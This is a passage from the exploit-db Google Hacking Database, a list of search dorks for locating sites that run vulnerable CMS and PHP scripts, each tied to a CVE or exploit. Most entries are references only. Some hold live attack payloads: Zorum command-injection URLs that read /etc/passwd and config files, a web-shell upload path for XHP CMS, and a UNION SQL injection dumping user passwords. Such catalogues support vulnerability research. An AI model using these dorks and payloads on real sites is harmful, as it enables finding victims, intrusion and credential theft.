<shortDescription>&quot;powered by XHP CMS&quot;</shortDescription>
<textualDescription>XHP CMS 0.5 (upload) Remote Command Execution - CVE: 2006-1371: https://www.exploit-db.com/exploits/1605</textualDescription>
<query>&quot;powered by XHP CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+XHP+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/1605</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1318</id>
<link>https://www.exploit-db.com/ghdb/1318</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by XHP CMS&quot; -ihackstuff -exploit -xhp.targetit.ro</shortDescription>
<textualDescription>tested version: 0.5 without to have admin rights, you can go to: http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/manager.php or http://[target]/path_to_xhp_cms]/inc/htmlarea/plugins/FileManager/standalonemanager.php to upload a shell with the usual code inside... after: http://[target]/[path]/filemanager/shell.php?cmd=ls%20-la tool: http://retrogod.altervista.org/XHP_CMS_05_xpl.html</textualDescription>
<query>&quot;Powered by XHP CMS&quot; -ihackstuff -exploit -xhp.targetit.ro</query>
<querystring>https://www.google.com/search?q=%22Powered+by+XHP+CMS%22+-ihackstuff+-exploit+-xhp.targetit.ro&amp;num=100&amp;start=200&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1405</id>
<link>https://www.exploit-db.com/ghdb/1405</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by xmb&quot;</shortDescription>
<textualDescription>this is for XMB</textualDescription>
<query>&quot;powered by xmb&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+xmb%22&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-08-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3569</id>
<link>https://www.exploit-db.com/ghdb/3569</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by XMB&quot;</shortDescription>
<textualDescription>XMB 1.9.6 Final basename() Remote Command Execution - CVE: 2006-4191:
https://www.exploit-db.com/exploits/2178</textualDescription>
<query>&quot;Powered by XMB&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+XMB%22</querystring>
<edb>https://www.exploit-db.com/exploits/2178</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3590</id>
<link>https://www.exploit-db.com/ghdb/3590</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by XMB&quot;</shortDescription>
<textualDescription>CVE: 2006-3994
EDB-ID: 2105
This search can potentially identify vulnerable installations of XMB</textualDescription>
<query>http://www.google.com/search?q=&quot;Powered+by+XMB&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered+by+XMB&quot;</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1179</id>
<link>https://www.exploit-db.com/ghdb/1179</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by XOOPS 2.2.3 Final&quot;</shortDescription>
<textualDescription>XOOPS 2.2.3 Arbitrary local file inclusionThis a generic dork for the version I tested, advisory &amp; poc exploit:http://rgod.altervista.org/xoops_xpl.html</textualDescription>
<query>&quot;Powered by XOOPS 2.2.3 Final&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+XOOPS+2.2.3+Final%22</querystring>
<edb></edb>
<date>2005-11-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1776</id>
<link>https://www.exploit-db.com/ghdb/1776</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Xplode CMS&quot;</shortDescription>
<textualDescription>Xplode CMS (wrap_script) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/8373</textualDescription>
<query>&quot;Powered by Xplode CMS&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Xplode+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/8373</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2436</id>
<link>https://www.exploit-db.com/ghdb/2436</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by yacs&quot;</shortDescription>
<textualDescription>YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability: https://www.exploit-db.com/exploits/8066</textualDescription>
<query>&quot;Powered by yacs&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+yacs%22</querystring>
<edb>https://www.exploit-db.com/exploits/8066</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>611</id>
<link>https://www.exploit-db.com/ghdb/611</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by YaPig V0.92b&quot;</shortDescription>
<textualDescription>YaPiG is reported to contain an HTML injection vulnerability. The problem is reported to present itself due to a lack of sanitization performed on certain field data.This may allow an attacker to inject malicious HTML and script code into the application.http://www.securityfocus.com/bid/11452</textualDescription>
<query>&quot;Powered by YaPig V0.92b&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+YaPig+V0.92b%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-10-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>2069</id>
<link>https://www.exploit-db.com/ghdb/2069</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by yappa-ng 2.3.1&quot; AND &quot;Powered by yappa-ng 2.3.1&quot;</shortDescription>
<textualDescription>yappa-ng 2.3.1 (admin_modules) Remote File Include Vulnerability: https://www.exploit-db.com/exploits/2292</textualDescription>
<query>&quot;Powered by yappa-ng 2.3.1&quot; AND &quot;Powered by yappa-ng 2.3.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+yappa-ng+2.3.1%22+AND+%22Powered+by+yappa-ng+2.3.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/2292</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>541</id>
<link>https://www.exploit-db.com/ghdb/541</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by yappa-ng&quot;</shortDescription>
<textualDescription>yappa-ng is a very powerful but easy to install and easy to use online PHP photo gallery for all Operating Systems (Linux/UNIX, Windows, MAC, ...), and all Webservers (Apache, IIS, ...) with no need for a DataBase (no MySQL,...).yappa-ng is prone to a security vulnerability in the AddOn that shows a random image from any homepage. This issue may let unauthorized users access images from locked albums.http://www.securityfocus.com/bid/11314</textualDescription>
<query>&quot;Powered by yappa-ng&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+yappa-ng%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>2355</id>
<link>https://www.exploit-db.com/ghdb/2355</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by YDC&quot;</shortDescription>
<textualDescription>YDC (kdlist.php cat) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6811</textualDescription>
<query>&quot;Powered by YDC&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+++++YDC%22</querystring>
<edb>https://www.exploit-db.com/exploits/6811</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3662</id>
<link>https://www.exploit-db.com/ghdb/3662</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by YourTube v1.0&quot;</shortDescription>
<textualDescription>Author: AtT4CKxT3rR0r1ST CSRF: https://www.exploit-db.com/exploits/15892</textualDescription>
<query>&quot;Powered by YourTube v1.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered%20by%20YourTube%20v1.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/15892</edb>
<date>2011-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3439</id>
<link>https://www.exploit-db.com/ghdb/3439</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by yourtube&quot;</shortDescription>
<textualDescription>YourTube 2.0 Arbitrary Database Disclosure: https://www.exploit-db.com/exploits/9073</textualDescription>
<query>&quot;powered by yourtube&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+yourtube%22</querystring>
<edb>https://www.exploit-db.com/exploits/9073</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2334</id>
<link>https://www.exploit-db.com/ghdb/2334</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by ZeeMatri&quot;</shortDescription>
<textualDescription>ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability - CVE: 2008-5782: https://www.exploit-db.com/exploits/7072</textualDescription>
<query>&quot;Powered by ZeeMatri&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by+ZeeMatri%22</querystring>
<edb>https://www.exploit-db.com/exploits/7072</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5857</id>
<link>https://www.exploit-db.com/ghdb/5857</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Zimplit CMS&quot;</shortDescription>
<textualDescription>#Google Dork: &quot;Powered by Zimplit CMS&quot;
# By using this dork, sites &quot;Powered by Zimplit CMS&quot; can be found. Zimplit
CMS is prone to multiple cross-site-scripting vulnerabilities because it
fails to properly sanitize user-supplied input. This is linked to the
following exploit: https://www.exploit-db.com/exploits/35063
# Date: 30/03/2020
# Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by Zimplit CMS&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Zimplit CMS&quot;</querystring>
<edb></edb>
<date>2020-03-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3688</id>
<link>https://www.exploit-db.com/ghdb/3688</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by zipbox media&quot;</shortDescription>
<textualDescription>Author:XaDaL http://site.com/album.php?id=[SQLi]</textualDescription>
<query>&quot;powered by zipbox media&quot;</query>
<querystring>https://www.google.com/search?q=%22powered%20by%20zipbox%20media%22</querystring>
<edb></edb>
<date>2011-02-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>3692</id>
<link>https://www.exploit-db.com/ghdb/3692</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;POWERED BY ZIPBOX MEDIA&quot; inurl:&quot;album.php&quot;</shortDescription>
<textualDescription>Author : AtT4CKxT3rR0r1ST
SQL Injection: www.site.com/album.php?id=null[Sql]</textualDescription>
<query>&quot;POWERED BY ZIPBOX MEDIA&quot; inurl:&quot;album.php&quot;</query>
<querystring>https://www.google.com/search?q=&quot;POWERED BY ZIPBOX MEDIA&quot; inurl:&quot;album.php&quot;</querystring>
<edb></edb>
<date>2011-03-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>3011</id>
<link>https://www.exploit-db.com/ghdb/3011</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by zomplog&quot;</shortDescription>
<textualDescription>Zomplog</textualDescription>
<query>&quot;powered by zomplog&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+zomplog%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1575</id>
<link>https://www.exploit-db.com/ghdb/1575</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by zomplog&quot;</shortDescription>
<textualDescription>Zomplog 3.8.2 (force_download.php) File Disclosure Vulnerability: https://www.exploit-db.com/exploits/5636</textualDescription>
<query>&quot;powered by zomplog&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by+zomplog%22</querystring>
<edb>https://www.exploit-db.com/exploits/5636</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3480</id>
<link>https://www.exploit-db.com/ghdb/3480</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Zomplog&quot;</shortDescription>
<textualDescription>Zomplog 3.8.1 upload_files.php Arbitrary File Upload - CVE: 2007-5230: https://www.exploit-db.com/exploits/4466</textualDescription>
<query>&quot;Powered by Zomplog&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+Zomplog%22</querystring>
<edb>https://www.exploit-db.com/exploits/4466</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2713</id>
<link>https://www.exploit-db.com/ghdb/2713</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By Zoopeer&quot;</shortDescription>
<textualDescription>Zoopeer 0.1 &amp; 0.2 (fckeditor) Shell Upload Vulnerability: https://www.exploit-db.com/exploits/15354</textualDescription>
<query>&quot;Powered By Zoopeer&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By+Zoopeer%22</querystring>
<edb>https://www.exploit-db.com/exploits/15354</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1072</id>
<link>https://www.exploit-db.com/ghdb/1072</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by Zorum 3.5&quot;</shortDescription>
<textualDescription>Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07 $doubleApp = isset($argv[1]); ...14 if( $doubleApp )15 {16 $appDir = $argv[1];17 system(&quot;mkdir $prodDir/$appDir&quot;); ...a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on...googledork:&quot;Powered by Zorum 3.5&quot;rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html</textualDescription>
<query>&quot;Powered by Zorum 3.5&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=%22Powered+by+Zorum+3.5%22</querystring>
<edb></edb>
<date>2005-08-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>2902</id>
<link>https://www.exploit-db.com/ghdb/2902</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by [ iSupport 1.8 ]&quot;</shortDescription>
<textualDescription>iSupport 1.8 XSS/LFI - CVE: 2009-4434: https://www.exploit-db.com/exploits/10478</textualDescription>
<query>&quot;Powered by [ iSupport 1.8 ]&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by+%5B+iSupport+1.8+%5D%22</querystring>
<edb>https://www.exploit-db.com/exploits/10478</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3445</id>
<link>https://www.exploit-db.com/ghdb/3445</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: Arab Portal v2&quot;</shortDescription>
<textualDescription>Arab Portal v2.x (forum.php qc) Remote SQL Injection - CVE: 2009-2781: https://www.exploit-db.com/exploits/9320</textualDescription>
<query>&quot;Powered by: Arab Portal v2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+Arab+Portal+v2%22</querystring>
<edb>https://www.exploit-db.com/exploits/9320</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1535</id>
<link>https://www.exploit-db.com/ghdb/1535</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: Censura&quot;</shortDescription>
<textualDescription>Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability - CVE: 2007-2673: https://www.exploit-db.com/exploits/3843</textualDescription>
<query>&quot;Powered by: Censura&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+Censura%22</querystring>
<edb>https://www.exploit-db.com/exploits/3843</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1673</id>
<link>https://www.exploit-db.com/ghdb/1673</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: Elite Gaming Ladders v3.2&quot;</shortDescription>
<textualDescription>Elite Gaming Ladders 3.2 (platform) SQL Injection Vulnerability - CVE: 2009-3314: https://www.exploit-db.com/exploits/9702</textualDescription>
<query>&quot;Powered by: Elite Gaming Ladders v3.2&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+Elite+Gaming+Ladders+v3.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/9702</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2022</id>
<link>https://www.exploit-db.com/ghdb/2022</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by: elkagroup&quot;</shortDescription>
<textualDescription>elkagroup SQL Injection Vulnerability - CVE: 2009-4569: https://www.exploit-db.com/exploits/10330</textualDescription>
<query>&quot;powered by: elkagroup&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by:+elkagroup%22</querystring>
<edb>https://www.exploit-db.com/exploits/10330</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2924</id>
<link>https://www.exploit-db.com/ghdb/2924</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: eSmile&quot;</shortDescription>
<textualDescription>eSmile Script (index.php) SQL Injection Vulnerability - CVE: 2010-0764: https://www.exploit-db.com/exploits/11382</textualDescription>
<query>&quot;Powered by: eSmile&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by%3A+eSmile%22</querystring>
<edb>https://www.exploit-db.com/exploits/11382</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3654</id>
<link>https://www.exploit-db.com/ghdb/3654</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: IRIran.net&quot;</shortDescription>
<textualDescription>IRIran eShop Builder SQL Injection: http://server/patch/pages/index.php?id=0[SQL]
Submitter: Ahoora</textualDescription>
<query>&quot;Powered by: IRIran.net&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+IRIran.net%22</querystring>
<edb></edb>
<date>2010-12-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>1103</id>
<link>https://www.exploit-db.com/ghdb/1103</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: Land Down Under 800&quot; | &quot;Powered by: Land Down Under 801&quot; - www.neocrome.net</shortDescription>
<textualDescription>Land Down Under is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.http://secunia.com/advisories/16878/</textualDescription>
<query>&quot;Powered by: Land Down Under 800&quot; | &quot;Powered by: Land Down Under 801&quot; - www.neocrome.net</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=%22Powered+by%3A+Land+Down+Under+800%22+%7C++%22Powered+by%3A+Land+Down+Under+801%22+-+www.neocrome.net</querystring>
<edb></edb>
<date>2005-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1156</id>
<link>https://www.exploit-db.com/ghdb/1156</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered By: lucidCMS 1.0.11&quot;</shortDescription>
<textualDescription>Lucid CMS 1.0.11 SQL Injection /Login bypassthis is the dork for ther version I tested:&quot;Powered By: lucidCMS 1.0.11&quot;advisory/poc exploit:http://rgod.altervista.org/lucidcms1011.htmlwe have an XSS even:http://packetstorm.linuxsecurity.com/0509-exploits/lucidCMS.txt</textualDescription>
<query>&quot;Powered By: lucidCMS 1.0.11&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+By%3A+lucidCMS+1.0.11%22</querystring>
<edb></edb>
<date>2005-09-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>2295</id>
<link>https://www.exploit-db.com/ghdb/2295</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: MFH v1&quot;</shortDescription>
<textualDescription>Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability - CVE: 2008-2521: https://www.exploit-db.com/exploits/5598</textualDescription>
<query>&quot;Powered by: MFH v1&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Powered+by:+MFH+v1%22</querystring>
<edb>https://www.exploit-db.com/exploits/5598</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2979</id>
<link>https://www.exploit-db.com/ghdb/2979</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: MyPHP Forum&quot;</shortDescription>
<textualDescription>MyPHP Forum</textualDescription>
<query>&quot;Powered by: MyPHP Forum&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+MyPHP+Forum%22</querystring>
<edb></edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2498</id>
<link>https://www.exploit-db.com/ghdb/2498</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: PhotoPost PHP 4.6&quot; or &quot;Powered by: PhotoPost PHP 4.5&quot;</shortDescription>
<textualDescription>PhotoPost 4.6 (PP_PATH) Remote File Include Vulnerability - CVE: 2006-4828: https://www.exploit-db.com/exploits/2369</textualDescription>
<query>&quot;Powered by: PhotoPost PHP 4.6&quot; or &quot;Powered by: PhotoPost PHP 4.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+PhotoPost+PHP+4.6%22+or+%22Powered+by:+PhotoPost+PHP+4.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/2369</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2090</id>
<link>https://www.exploit-db.com/ghdb/2090</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: PhotoPost PHP 4.6.5&quot;</shortDescription>
<textualDescription>PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability - CVE: 2004-0239: https://www.exploit-db.com/exploits/14453</textualDescription>
<query>&quot;Powered by: PhotoPost PHP 4.6.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+PhotoPost+PHP+4.6.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/14453</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3679</id>
<link>https://www.exploit-db.com/ghdb/3679</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: PHP Link Directory&quot;</shortDescription>
<textualDescription>CSRF Vuln: https://www.exploit-db.com/exploits/16037/</textualDescription>
<query>&quot;Powered by: PHP Link Directory&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered%20by:%20PHP%20Link%20Directory%22</querystring>
<edb>https://www.exploit-db.com/exploits/16037</edb>
<date>2011-01-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>1758</id>
<link>https://www.exploit-db.com/ghdb/1758</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: PostGuestbook 0.6.1&quot;</shortDescription>
<textualDescription>PHP-Nuke Module PostGuestbook 0.6.1 (tpl_pgb_moddir) RFI Vulnerability - CVE: 2007-1372: https://www.exploit-db.com/exploits/3423</textualDescription>
<query>&quot;Powered by: PostGuestbook 0.6.1&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+PostGuestbook+0.6.1%22</querystring>
<edb>https://www.exploit-db.com/exploits/3423</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1624</id>
<link>https://www.exploit-db.com/ghdb/1624</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: PreProjects&quot;</shortDescription>
<textualDescription>Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13987</textualDescription>
<query>&quot;Powered by: PreProjects&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+PreProjects%22</querystring>
<edb>https://www.exploit-db.com/exploits/13987</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3045</id>
<link>https://www.exploit-db.com/ghdb/3045</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by: profitCode&quot;</shortDescription>
<textualDescription>PayProCart 1146078425 Multiple Remote File Include Vulnerabilities - CVE: 2006-4672: https://www.exploit-db.com/exploits/2316</textualDescription>
<query>&quot;powered by: profitCode&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by:+profitCode%22</querystring>
<edb>https://www.exploit-db.com/exploits/2316</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2378</id>
<link>https://www.exploit-db.com/ghdb/2378</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: Southburn&quot;</shortDescription>
<textualDescription>southburn Web (products.php) Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11430</textualDescription>
<query>&quot;Powered by: Southburn&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by:+Southburn%22</querystring>
<edb>https://www.exploit-db.com/exploits/11430</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3648</id>
<link>https://www.exploit-db.com/ghdb/3648</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;POWERED BY: WEBINSPIRE&quot;</shortDescription>
<textualDescription>Author: ghost-dz SQL Injection: http://server/pages.php?id=30+and+1=0+union+select+1,concat(id,0x3a,usr,0x3a,pwd,0x3a,email),3,4,5,6+from+utenti--</textualDescription>
<query>&quot;POWERED BY: WEBINSPIRE&quot;</query>
<querystring>https://www.google.com/search?q=%22POWERED+BY:+WEBINSPIRE%22</querystring>
<edb></edb>
<date>2010-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>1565</id>
<link>https://www.exploit-db.com/ghdb/1565</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powered by: WebLeague&quot;</shortDescription>
<textualDescription>webLeague 2.2.0 (install.php) Remote Change Password: https://www.exploit-db.com/exploits/9164</textualDescription>
<query>&quot;powered by: WebLeague&quot;</query>
<querystring>https://www.google.com/search?q=%22powered+by:+WebLeague%22</querystring>
<edb>https://www.exploit-db.com/exploits/9164</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2860</id>
<link>https://www.exploit-db.com/ghdb/2860</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powered by: Yes Solutions&quot;</shortDescription>
<textualDescription>Yes Solutions - Webapp SQL Injection: https://www.exploit-db.com/exploits/11368</textualDescription>
<query>&quot;Powered by: Yes Solutions&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by%3A+Yes+Solutions%22</querystring>
<edb>https://www.exploit-db.com/exploits/11368</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2624</id>
<link>https://www.exploit-db.com/ghdb/2624</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;powergap&quot; or &quot;s04.php&quot; or s01.php or s02.php</shortDescription>
<textualDescription>POWERGAP 2003 (s0x.php) Remote File Include Vulnerability - CVE: 2006-4236: https://www.exploit-db.com/exploits/2201</textualDescription>
<query>&quot;powergap&quot; or &quot;s04.php&quot; or s01.php or s02.php</query>
<querystring>https://www.google.com/search?q=%22powergap%22+or+%22s04.php%22+or+s01.php+or+s02.php</querystring>
<edb>https://www.exploit-db.com/exploits/2201</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2821</id>
<link>https://www.exploit-db.com/ghdb/2821</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;PowerMovieList 0.14 Beta Copyright&quot;</shortDescription>
<textualDescription>PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8062</textualDescription>
<query>&quot;PowerMovieList 0.14 Beta Copyright&quot;</query>
<querystring>https://www.google.com/search?q=%22PowerMovieList+0.14+Beta+Copyright%22</querystring>
<edb>https://www.exploit-db.com/exploits/8062</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1747</id>
<link>https://www.exploit-db.com/ghdb/1747</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Powie's PSCRIPT MatchMaker 4.05&quot;</shortDescription>
<textualDescription>Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability - CVE: 2006-6039: https://www.exploit-db.com/exploits/2798</textualDescription>
<query>&quot;Powie's PSCRIPT MatchMaker 4.05&quot;</query>
<querystring>https://www.google.com/search?q=%22Powie's+PSCRIPT+MatchMaker+4.05%22</querystring>
<edb>https://www.exploit-db.com/exploits/2798</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3443</id>
<link>https://www.exploit-db.com/ghdb/3443</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;propulsé par JBlog&quot;</shortDescription>
<textualDescription>JBlog 1.0 Create / Delete Admin Authentication Bypass - CVE: 2007-3973: https://www.exploit-db.com/exploits/4211</textualDescription>
<query>&quot;propulsé par JBlog&quot;</query>
<querystring>https://www.google.com/search?q=%22propuls%C3%83%C2%A9+par+JBlog%22</querystring>
